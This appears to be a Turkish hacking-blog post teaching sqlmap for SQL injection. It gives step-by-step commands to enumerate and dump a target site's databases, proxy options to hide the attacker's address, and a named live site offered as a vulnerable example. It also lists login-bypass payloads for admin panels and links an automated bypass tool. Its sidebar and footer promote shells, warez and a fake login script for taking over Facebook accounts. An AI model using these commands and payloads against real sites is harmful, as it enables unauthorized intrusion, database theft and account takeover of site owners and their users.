PHP HTML Webmaster Web tasarım kişisel blog hosting Linux Plesk Hack shell Alfa Shell Bypass Shell Warez Scriptler Warez Scriptler PHP Scriptleri Wordpress Temaları Hacking Blog Local Root Exploit Film Scripti Blog Scripti Kızların numarasını alma yöntemi Kızların numarasını alın Spotify Premium Account Hacker Eğitim Seti
hacking security blog local root exploits teknoloji blogu turkish hack blog hack tools İnternetsiz Whatsapp Kullanmak Whatsapp internetsiz kullanmak Whatsapp Engelleyen Kişiye Mesaj Gönderme WhatsApp'ta Sizi Engelleyen Kişiye Mesaj Atabilirsiniz! kızların numarası nasıl alınır? Link.tl reklam geçme Link.tl reklamları atlama Ttnet datası Film scripti Film teması dizi teması cpanel portları yasaklamak İnstagram Fake Script Steam bedava oyun alma Sqlmap kullanımı Gizli Numarayı Bulmak 2017 Exploit Facebook Hesabını Kalıcı Olarak Silme Hız Ölçme Scripti Wordpress Dizi ve Film Teması Wordpress Dizi Teması Film Scripti Script paylaşım scripti Hacker Eğitim Seti Trojan nasıl temizlenir?
Ana Sayfa / Konular / SqlMap Nasıl Kullanılır? SqlMaP Nedir?

SqlMap Nasıl Kullanılır? SqlMaP Nedir?

Video:

SQLMAP İNDİR:
[​IMG]
Linux:
-UBUNTU&Kali vb.. Ve Dağıtımlar; sudo apt-get install sqlmap
Fux & Fedora vb..; dnf install sqlmap
-Arch: pacman install sqlmap
-VB; yum install sqlmap
Windows:
Pythonu İndirip CMD pythonun olduğu konumda İle Şu Komutu Çalıştırın:

sqlmap.py site.com –dbs
Gerisi Videodaki gibi olcak

Github; https://github.com/sqlmapproject/sqlmap

İyi Seyirler..

SQLMAP KULLANIMI(Komutlar Mysql Dump);
Sırasyla:
1)
sqlmap -u http://www.hedefsite.com/index.php?id=1 –dbs
2) 
sqlmap -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı –tables
3) 
sqlmap -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı –columns
4) 
sqlmap.py -u http://www.hedefsite.com/index.php?id=1 -D veritabanıadı -T tabloadı -C kolonadı –dump

———————————————————————————————-

Tamam da SQL sadece GET parametresi ile mi olmak zorunda ? POST parametreli bir sql arıyorsak ne yapmalıyız diyorsanız;

sqlmap -u “http://www.ornek.com/index.php?id=2” –data=”Post verisi” –dbms
sqlmap -u “http://www.ornek.com/index.php?id=2” –data=”adi=merdincz&domain=merdincz.com” –dbms

Peki tüm parametreleri taraması yerine, sadece benim belirttiğim parametrede sql denemesini nasıl sağlatabiliriz ?

sqlmap -u “http://www.ornek.com/index.php?id=2&parametre=2” -p “parametre” -dbms
veya
sqlmap -u “http://www.ornek.com/index.php?id=2&parametre=2*” -dbms

Tamam peki hepsi iyi güzel de, ip işi için ne yapıcaz ? Proxy desteği var mıdır derseniz;

sqlmap -u “http://www.ornek.com/index.php?id=2” -dbms –proxy=”IP:port” –proxy-cred=”KulAdi:Sifre”

Yaptığı tüm işlemleri sql sorgularını, cevaplarını nasıl görebilirim diyorsanız;

sqlmap -u “http://www.ornek.com/index.php?id=2” -dbms -t /usr/share/log.txt

SQL AÇIK OLDUĞUNU NASIL ANLARIZ?;
Örnek Site; http://www.romanianwriters.ro/s.php?id=1
Sonuna = ‘ veya %27 Eklediğimizde Böyle(VB.) Bir Hata Verirse;
[​IMG]
(Sql Açık Var Demektir :D)
“Sql Injection Login Bypass” Nedir ?

Girilen Zararlı Karakterlerin Filtrelenmemesinden Dolayı Kaynaklanan Açıktır.Aynı Sql Injectiondaki Gibi Veri Tabanından Bilgi Çekmek İçin Kullanılan Komutlar İle Siteye Giriş Yapılır.Buradaki Amaç Komutları Username ve Password Kısmına Yazarak Siteye Giriş Yapmaktır.

“Sql Injection Login Bypass” Nasıl Uygulanır ?

Örnek Olarak Bir Sitenin Admin Paneline Girdiğimizi Varsayıyorum.Bir User ve Pass İsteyen İnput Bölümü Var.Şimdi Komutları Kullanarak Girmeyi Deneyelim.

User ve Pass Kısmına
User: ‘or’
Pass: ‘or’
Diğer Bypass Komutları;

1’or’1’=’1
‘ or 1=1 –
1’or’1’=’1
admin’–
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”)

———————————————
OTOMATİK LOGİN Bypass Toolu( Bunuda Eklemiş Olayım :) ) ;

İNDİR;

https://yadi.sk/d/TLdEiilMmmY3n

VirüsTOTAL: https://www.virustotal.com/tr/file/…7bc8d4bdb03641c0e15026ab/analysis/1452378670/

 

About Admin

Admin

Ayrıca bakınız

Facebook Fake Script (Güncel)

İstek üzerinede sizlere bu konuyu paylaşıyorum. Fake script sayesinde hedefinizdeki kişilerin hesaplarına ulaşabilirsiniz. Tabi sizin …

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir